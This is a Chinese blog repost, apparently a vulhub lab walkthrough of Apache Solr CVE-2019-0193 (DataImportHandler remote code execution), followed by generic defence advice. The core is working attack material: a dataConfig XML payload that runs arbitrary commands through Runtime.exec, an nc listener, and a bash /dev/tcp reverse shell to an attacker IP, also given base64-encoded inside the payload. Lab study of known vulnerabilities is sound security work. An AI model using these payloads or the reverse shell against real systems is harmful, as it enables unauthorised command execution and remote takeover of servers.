其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193)

2024-05-13 05:44

本文主要是介绍其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

什么是 Apache Solr 

Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。


目录:

什么是 Apache Solr 

生成的漏洞原理:

开启 漏洞 靶场:

(1)查看目录:

(2)启用 vulhub 漏洞:

(3)进行浏览:主机的 8983 端口.

进行 漏洞 测试:

(1)查看这个 Apache Solr 安全框架最新漏洞数据.(查看阿里云漏洞库)

(2)进入到页面中,按着步骤进行操作.

(3)漏洞的利用,实现任意命令执行.

(4)漏洞利用,反弹 shell .

如何防护 Apache Solr 安全漏洞:


生成的漏洞原理:

1. 远程代码执行漏洞:- 原理是 Solr 中的某些功能或组件存在安全设计缺陷,允许攻击者通过精心构造的输入数据来执行任意代码。- 例如,Solr 的 velocity 模板引擎曾经存在远程代码执行漏洞,允许攻击者在服务器上执行恶意代码。2. 信息泄露漏洞:- 原理是 Solr 在访问控制或权限管理方面存在缺陷,导致攻击者可以未经授权访问敏感信息。- 例如,Solr 的管理界面曾经存在信息泄露漏洞,允许攻击者获取配置文件、索引数据等敏感信息。3. 拒绝服务漏洞:- 原理是 Solr 在资源管理或输入验证方面存在问题,导致服务器资源被耗尽或崩溃。- 例如,Solr 曾经存在一个漏洞,允许攻击者通过发送大量的请求来消耗服务器的CPU和内存资源,从而导致服务不可用。4. 跨站脚本(XSS)漏洞:- 原理是 Solr 在输入输出sanitization方面存在缺陷,导致攻击者可以注入恶意脚本。- 例如,Solr 的管理界面曾经存在XSS漏洞,允许攻击者在用户浏览器中执行恶意脚本。总的来说,这些漏洞的根源都是由于 Solr 在安全设计、实现和配置方面存在问题,从而为攻击者提供了可乘之机。用户需要密切关注 Solr 的安全动态,及时修复已知漏洞,并采取防护措施来降低被攻击的风险。

开启 漏洞 靶场:

Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客


(1)查看目录:

(1)cd vulhub(2)ls


(2)启用 vulhub 漏洞:

(1)cd solr                       // 切换到对应的漏洞目录.(2)cd CVE-2019-0193               // 切换到对应的漏洞版本.(3)docker-compose build           // 建立容器(4)docker-compose up -d           // 启用漏洞环境.(5)docker ps                      // 查看环境运行状态

靶场还需要执行这个命令,要不然没有 test 选项,则就没有这个漏洞.(这个漏洞是存在在页面中的)

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db


(3)进行浏览:主机的 8983 端口.


进行 漏洞 测试:

(1)查看这个 Apache Solr 安全框架最新漏洞数据.(查看阿里云漏洞库)

https://avd.aliyun.com/search?q=solr


(2)进入到页面中,按着步骤进行操作.

(3)漏洞的利用,实现任意命令执行.

下面的代码是创建一个新的文件.(文件名是 bgxg,如果想执行别的命令,则修改代码中的 touch /tmp/bgxg 就行.)

<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("touch /tmp/bgxg");}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document>
</dataConfig>

查看是否成功的结果,在服务端执行查看目录中的文件是否存在,我们创建的文件.

docker-compose exec solr ls /tmp


(4)漏洞利用,反弹 shell .

先使用 nc 进行监听 nc -lvvp port端口号nc -lvvp 1234再在目标机器执行 bash -i >& /dev/tcp/攻击ip/端口 0>&1 bash -i >& /dev/tcp/172.16.10.19/1234 0>&1bash -c {echo,把上面的代码通过Base64编码然后添加在这里}|{base64,-d}|{bash,-i}bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTkvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}

1.先执行监听.


 2.把我们制作的代码添加在这里面.(点击执行.)

3. (比如:这个代码是替换的完整代码是这样子)

<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTkvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}");}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document>
</dataConfig>

4.点击执行后,成功反弹 shell .


如何防护 Apache Solr 安全漏洞:

1. 及时修复已知漏洞:- 密切关注 Solr 的安全公告,及时将 Solr 版本升级到修复了已知漏洞的版本。- 定期检查 Solr 服务器是否存在已知的安全漏洞,并及时打上补丁。2. 采取安全配置:- 确保 Solr 的管理界面和 API 接口进行了适当的访问控制和权限管理。- 禁用或谨慎使用可能存在安全隐患的功能和组件,如 velocity 模板引擎。- 对 Solr 的输入输出进行充分的sanitization,以防止 XSS 等漏洞。3. 实施防护措施:- 部署 Web 应用防火墙(WAF)等安全设备,对 Solr 服务器进行防护。- 开启 Solr 的安全特性,如SSL/TLS加密、HTTPS访问等。- 监控 Solr 服务器的运行状态和异常行为,及时发现和响应安全事件。4. 加强安全意识和培训:- 提高运维人员对 Solr 安全的认知,培养良好的安全意识。- 定期组织安全培训和演练,提升运维人员的安全技能。总之,防护 Solr 安全漏洞需要从多个层面入手,包括及时修复漏洞、采取安全配置、实施防护措施,以及加强安全意识培训等。只有持续关注安全动态,并采取综合性的防护措施,才能有效降低 Solr 服务器被攻击的风险。

  

   

    

这篇关于其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/984838

相关文章

HTML5的input标签的`type`属性值详解和代码示例

《HTML5的input标签的`type`属性值详解和代码示例》HTML5的`input`标签提供了多种`type`属性值,用于创建不同类型的输入控件,满足用户输入的多样化需求,从文本输入、密码输入、... 目录一、引言二、文本类输入类型2.1 text2.2 password2.3 textarea(严格

input的accept属性让文件上传安全高效

《input的accept属性让文件上传安全高效》文章介绍了HTML的input文件上传`accept`属性在文件上传校验中的重要性和优势,通过使用`accept`属性,可以减少前端JavaScrip... 目录前言那个悄悄毁掉你上传体验的“常见写法”改变一切的 html 小特性:accept真正的魔法:让

JAVA项目swing转javafx语法规则以及示例代码

《JAVA项目swing转javafx语法规则以及示例代码》:本文主要介绍JAVA项目swing转javafx语法规则以及示例代码的相关资料,文中详细讲解了主类继承、窗口创建、布局管理、控件替换、... 目录最常用的“一行换一行”速查表(直接全局替换)实际转换示例(JFramejs → JavaFX)迁移建

Go异常处理、泛型和文件操作实例代码

《Go异常处理、泛型和文件操作实例代码》Go语言的异常处理机制与传统的面向对象语言(如Java、C#)所使用的try-catch结构有所不同,它采用了自己独特的设计理念和方法,:本文主要介绍Go异... 目录一:异常处理常见的异常处理向上抛中断程序恢复程序二:泛型泛型函数泛型结构体泛型切片泛型 map三:文

MyBatis中的两种参数传递类型详解(示例代码)

《MyBatis中的两种参数传递类型详解(示例代码)》文章介绍了MyBatis中传递多个参数的两种方式,使用Map和使用@Param注解或封装POJO,Map方式适用于动态、不固定的参数,但可读性和安... 目录✅ android方式一:使用Map<String, Object>✅ 方式二:使用@Param

SpringBoot实现图形验证码的示例代码

《SpringBoot实现图形验证码的示例代码》验证码的实现方式有很多,可以由前端实现,也可以由后端进行实现,也有很多的插件和工具包可以使用,在这里,我们使用Hutool提供的小工具实现,本文介绍Sp... 目录项目创建前端代码实现约定前后端交互接口需求分析接口定义Hutool工具实现服务器端代码引入依赖获

利用Python在万圣节实现比心弹窗告白代码

《利用Python在万圣节实现比心弹窗告白代码》:本文主要介绍关于利用Python在万圣节实现比心弹窗告白代码的相关资料,每个弹窗会显示一条温馨提示,程序通过参数方程绘制爱心形状,并使用多线程技术... 目录前言效果预览要点1. 爱心曲线方程2. 显示温馨弹窗函数(详细拆解)2.1 函数定义和延迟机制2.2

SpringBoot整合Apache Spark实现一个简单的数据分析功能

《SpringBoot整合ApacheSpark实现一个简单的数据分析功能》ApacheSpark是一个开源的大数据处理框架,它提供了丰富的功能和API,用于分布式数据处理、数据分析和机器学习等任务... 目录第一步、添加android依赖第二步、编写配置类第三步、编写控制类启动项目并测试总结ApacheS

Springmvc常用的注解代码示例

《Springmvc常用的注解代码示例》本文介绍了SpringMVC中常用的控制器和请求映射注解,包括@Controller、@RequestMapping等,以及请求参数绑定注解,如@Request... 目录一、控制器与请求映射注解二、请求参数绑定注解三、其他常用注解(扩展)四、注解使用注意事项一、控制

Apache服务器IP自动跳转域名的问题及解决方案

《Apache服务器IP自动跳转域名的问题及解决方案》本教程将详细介绍如何通过Apache虚拟主机配置实现这一功能,并解决常见问题,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,... 目录​​问题背景​​解决方案​​方法 1:修改 httpd-vhosts.conf(推荐)​​步骤